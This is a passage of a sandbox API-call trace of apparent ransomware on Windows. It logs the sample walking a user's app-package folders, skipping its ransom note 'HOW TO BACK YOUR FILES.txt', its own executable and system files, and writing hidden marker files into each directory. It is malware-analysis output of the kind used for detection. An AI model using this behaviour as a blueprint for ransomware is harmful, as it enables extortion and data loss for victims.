(in: lpString1=0x130ebde, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0056.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0056.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x123820 [0056.159] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x121f88 [0056.159] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a9b49e8, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3a9b49e8, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0056.159] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0056.159] lstrcpyW (in: lpString1=0x130ebde, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0056.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0056.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x124d90 [0056.160] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x1222c8 [0056.160] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2c8c8f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9b33bde5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0056.160] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0056.160] lstrcpyW (in: lpString1=0x130ebde, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0056.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0056.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x124e58 [0056.160] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222e8 | out: ListHead=0xf68b0, ListEntry=0x1222e8) returned 0x121fe8 [0056.160] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713d778b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x713d778b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0056.160] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0056.160] lstrcpyW (in: lpString1=0x130ebde, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0056.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0056.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x124f20 [0056.161] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122208 | out: ListHead=0xf68b0, ListEntry=0x122208) returned 0x1222e8 [0056.161] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8832b29, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd8832b29, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd8832b29, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0056.161] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0056.161] lstrcpyW (in: lpString1=0x130ebde, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0056.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0056.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116380 [0056.161] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122208 [0056.161] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d31d85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9b33bde5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0056.161] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0056.161] lstrcpyW (in: lpString1=0x130ebde, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0056.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0056.161] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x124fe8 [0056.162] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122228 [0056.162] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d31d85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9b33bde5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0056.162] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0056.162] lstrcpyW (in: lpString1=0x130ebde, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.162] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.162] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.162] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.164] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.164] CloseHandle (hObject=0x278) returned 1 [0056.164] CloseHandle (hObject=0x27c) returned 1 [0056.164] GetCurrentThreadId () returned 0xd98 [0056.164] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0056.164] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState" [0056.164] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124fe8 | out: hHeap=0xe0000) returned 1 [0056.164] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0056.164] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState" [0056.164] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\" [0056.164] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0056.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.166] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.170] FlushFileBuffers (hFile=0x27c) returned 1 [0056.170] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.171] CloseHandle (hObject=0x27c) returned 1 [0056.171] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState") returned 92 [0056.171] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.171] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d31d85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeacd3e0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0056.171] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.172] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.172] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.172] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.172] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9b33bde5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2d31d85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeacd3e0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.172] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.172] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.172] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.172] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.172] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.172] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeacd3e0d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeacd3e0d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeacd3e0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.172] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.172] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.172] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeacd3e0d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeacd3e0d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeacd3e0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.172] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0056.172] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.172] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0056.172] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0056.173] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0056.173] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.173] CloseHandle (hObject=0x278) returned 1 [0056.173] CloseHandle (hObject=0x27c) returned 1 [0056.173] GetCurrentThreadId () returned 0xd98 [0056.173] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122228 [0056.173] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData" [0056.173] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116380 | out: hHeap=0xe0000) returned 1 [0056.173] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0056.173] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData" [0056.173] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\" [0056.173] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0056.173] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0056.175] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0056.178] FlushFileBuffers (hFile=0x27c) returned 1 [0056.179] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0056.179] CloseHandle (hObject=0x27c) returned 1 [0056.179] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData") returned 96 [0056.179] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.179] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8832b29, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd8832b29, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeacd3e0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0056.179] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.179] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.179] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0056.180] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.180] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8832b29, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xd8832b29, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeacd3e0d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.180] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.180] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0056.180] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0056.180] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.180] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.180] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeacd3e0d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeacd3e0d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeacfa2bd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0056.180] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.180] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0056.180] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeacd3e0d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeacd3e0d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeacfa2bd, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0056.180] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0056.180] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0056.180] CreateFileW 